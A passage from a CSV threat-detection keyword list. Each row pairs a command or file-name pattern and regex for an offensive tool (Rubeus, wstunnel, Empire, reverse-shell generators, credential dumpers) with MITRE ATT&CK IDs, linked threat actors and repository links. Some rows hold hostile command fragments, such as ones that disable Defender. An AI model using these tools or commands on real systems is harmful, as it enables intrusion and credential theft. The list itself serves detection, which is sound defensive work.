that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","2843" "* RemotePotato0.zip*",".{0,1000}\sRemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2849" "* --remote-ransomware*",".{0,1000}\s\-\-remote\-ransomware.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","2850" "* remoteshell.py*",".{0,1000}\sremoteshell\.py.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","2851" "* --remote-to-local socks://*",".{0,1000}\s\-\-remote\-to\-local\ssocks\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data 
Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2852" "* --remote-to-local tcp://*",".{0,1000}\s\-\-remote\-to\-local\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2853" "* --remote-to-local udp://*",".{0,1000}\s\-\-remote\-to\-local\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2854" "* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*",".{0,1000}\sremove\sdevice\sGUID\:001B2EE1\-AE95\-4146\-AE7B\-5928F1E4F396.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2855" "* -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true*",".{0,1000}\s\-RemoveDefinitions\s\-All\sSet\-MpPreference\s\-DisableIOAVProtection\s\$true.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","2856" "* renameMachine.py *",".{0,1000}\srenameMachine\.py\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2857" "* renew *.kirbi*",".{0,1000}\srenew\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2858" "* renew */ticket:*",".{0,1000}\srenew\s.{0,1000}\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2859" "* repo -u https://github.com/*",".{0,1000}\srepo\s\-u\shttps\:\/\/github\.com\/.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","2860" "* -Report PrivescCheck_*",".{0,1000}\s\-Report\sPrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","2861" "* -Report PrivescCheck_*",".{0,1000}\s\-Report\sPrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","2862" "* req -username * -p * -ca * -target * -template * -upn *",".{0,1000}\sreq\s\-username\s.{0,1000}\s\-p\s.{0,1000}\s\-ca\s.{0,1000}\s\-target\s.{0,1000}\s\-template\s.{0,1000}\s\-upn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2863" "* -request -dc-ip *",".{0,1000}\s\-request\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2864" "* -request -format hashcat -outputfile *",".{0,1000}\s\-request\s\-format\shashcat\s\-outputfile\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2865" "* request_shellcode.exe*",".{0,1000}\srequest_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2866" "* --requirement *Exegol/requirements.txt*",".{0,1000}\s\-\-requirement\s.{0,1000}Exegol\/requirements\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2867" "* resolveall.nse*",".{0,1000}\sresolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2868" "* restart dnscrypt-proxy*",".{0,1000}\srestart\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","2869" "* --RestoreShadowCred*",".{0,1000}\s\-\-RestoreShadowCred.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","2872" "* restoresig.py*",".{0,1000}\srestoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","2873" "* --restrict-to localhost:* wss://*",".{0,1000}\s\-\-restrict\-to\slocalhost\:.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket 
protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2874" "* resu ten*",".{0,1000}\sresu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2875" "* Retrieving NTLM Hashes without Touching LSASS*",".{0,1000}\sRetrieving\sNTLM\sHashes\swithout\sTouching\sLSASS.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","2876" "* --return_output --as_logged_on_user --cmd *",".{0,1000}\s\-\-return_output\s\-\-as_logged_on_user\s\-\-cmd\s.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","2877" "* rev_shell.py*",".{0,1000}\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - 
T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","2878" "* -Reverse -IPAddress * -Port *",".{0,1000}\s\-Reverse\s\-IPAddress\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","Invoke-PowerShellTcp args","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","2879" "* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","2880" "* reverse_shell_generator*",".{0,1000}\sreverse_shell_generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","N/A","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","2881" "* reverse-index.nse*",".{0,1000}\sreverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2882" "* ReverseShell.ahk*",".{0,1000}\sReverseShell\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","2883" "* reverse-shellcode.cpp*",".{0,1000}\sreverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","2884" "* --revshell*",".{0,1000}\s\-\-revshell.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","2885" "* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","2886" "* revshell.ps1*",".{0,1000}\srevshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2887" "* revshell.py*",".{0,1000}\srevshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","2888" "* revshell32.bin*",".{0,1000}\srevshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","2889" "* revshell64.bin*",".{0,1000}\srevshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - 
T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","2890" "* -RevToSelf *",".{0,1000}\s\-RevToSelf\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2891" "* rexec-brute.nse*",".{0,1000}\srexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2892" "* rfc868-time.nse*",".{0,1000}\srfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2893" "* rfs_injection.exe*",".{0,1000}\srfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2894" "* -Rhost * -WARFile http*",".{0,1000}\s\-Rhost\s.{0,1000}\s\-WARFile\shttp.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2895" "* -Rhosts * -Password * -Directory * -Dictionary *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Password\s.{0,1000}\s\-Directory\s.{0,1000}\s\-Dictionary\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","HTTP-Login.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2896" "* -Rhosts * -Path *.txt -Port *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Path\s.{0,1000}\.txt\s\-Port\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 